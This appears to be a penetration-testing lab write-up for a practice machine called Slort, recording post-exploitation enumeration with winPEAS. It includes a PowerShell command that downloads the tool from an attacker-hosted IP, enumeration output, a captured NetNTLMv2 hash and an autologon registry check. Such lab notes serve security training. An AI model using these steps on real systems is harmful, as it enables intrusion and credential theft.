PEAS
Running automated enumeration with winPEAS after completing manual enumeration
PS C:\tmp> iwr -uri http://192.168.45.215/winPEASx64.exe -OutFile .\winPEASx64.exe
Delivery complete
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: SLORT
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\rupert
LOCALAPPDATA: C:\Users\rupert\AppData\Local
PSModulePath: C:\Users\rupert\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
NDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\rupert\AppData\Local\Microsoft\WindowsApps;
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
LOGONSERVER: \\SLORT
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
HOMEDRIVE: C:
SystemRoot: C:\WINDOWS
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\rupert
AP_PARENT_PID: 3952
APPDATA: C:\Users\rupert\AppData\Roaming
PROCESSOR_REVISION: 0101
USERNAME: rupert
CommonProgramW6432: C:\Program Files\Common Files
OneDrive: C:\Users\rupert\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: SLORT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\WINDOWS\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\rupert\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\rupert\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\WINDOWS
USERDOMAIN: SLORT
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
LAPS
![LAPS](/Practice/Slort/4-Post_Enumeration/attachments/{AB085CF4-760E-4C32-9DFD-F3E4A2AEB883}.png)
LSA Protection
![LSA Protection](/Practice/Slort/4-Post_Enumeration/attachments/{F0FABDB3-E49A-418C-BAFF-A126251A95EE}.png)
Credentials Guard
![Credentials Guard](/Practice/Slort/4-Post_Enumeration/attachments/{8219C947-CB58-42DF-B182-5F02894B9516}.png)
Cached Creds
![Cached Creds](/Practice/Slort/4-Post_Enumeration/attachments/{92914D39-A9B2-4ADA-A521-3FA5AE8964CF}.png)
UAC
![UAC](/Practice/Slort/4-Post_Enumeration/attachments/{440145CC-8B6B-4597-803F-E96F27FB032D}.png)
PowerShell
![PowerShell](/Practice/Slort/4-Post_Enumeration/attachments/{B5619ECA-BCD0-4CF2-8B7D-C608532B3BBA}.png)
Drives
![Drives](/Practice/Slort/4-Post_Enumeration/attachments/{9C5D791D-09B4-4E8C-A93E-6B6175D85547}.png)
NTLM (NetNTLMv2 challenge-response captured for the current user; not the NT hash itself)
rupert::SLORT:1122334455667788:7d1ebc58218e13eb4d2f5cd1d6ba0478:0101000000000000f8bd4db9b079db01d0dd54ac72100635000000000800300030000000000000000000000000200000dcc10470e9dcf983f60633fcd18ba02dcc4f68753c268a54974cb1d372a176ac0a00100000000000000000000000000000000000090000000000000000000000
.NET
![.NET](/Practice/Slort/4-Post_Enumeration/attachments/{349C8A2C-680E-4371-9CA2-52959BB66CAC}.png)
Logged Users
![Logged Users](/Practice/Slort/4-Post_Enumeration/attachments/{FE4C640F-4AFD-46FA-B7EB-4457CB4ACB28}.png)
RDP Sessions
![RDP Sessions](/Practice/Slort/4-Post_Enumeration/attachments/{3A1C68A4-EF07-49D6-A507-A7A5112FBC6C}.png)
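AutoLogon
![AutoLogon](/Practice/Slort/4-Post_Enumeration/attachments/{1A67EE98-03CE-4E0A-975E-55255138448E}.png)
AutoAdminLogon is set to 1 for rupert, but the registry query below returns no DefaultPassword value, so no cleartext autologon password is exposed in this key.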
PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x2458669bb
ShutdownFlags REG_DWORD 0x6
Userinit REG_SZ C:\Windows\system32\userinit.exe,
AutoAdminLogon REG_SZ 1
DefaultDomainName REG_SZ DESKTOP-QD02EHR
DefaultUserName REG_SZ rupert
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-2032240294-1210393520-1520670448-1002
LastUsedUsername REG_SZ rupert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
Interesting Processes
![Interesting Processes](/Practice/Slort/4-Post_Enumeration/attachments/{42F45671-D77B-4AEF-B4F9-D6278DADBC4E}.png)
Modifiable Services
![Modifiable Services](/Practice/Slort/4-Post_Enumeration/attachments/{5AA7494C-85E4-4F8E-BF4A-64DD4C172B63}.png)
Installed Programs
![Installed Programs](/Practice/Slort/4-Post_Enumeration/attachments/{0BA69BBF-5297-4846-B684-9493CA68FC08}.png)
SMB
![SMB](/Practice/Slort/4-Post_Enumeration/attachments/{4B6EF690-1AC7-4F8B-B660-42F4EF537A9B}.png)
WSL
![WSL](/Practice/Slort/4-Post_Enumeration/attachments/Pasted-image-20250207235032.png)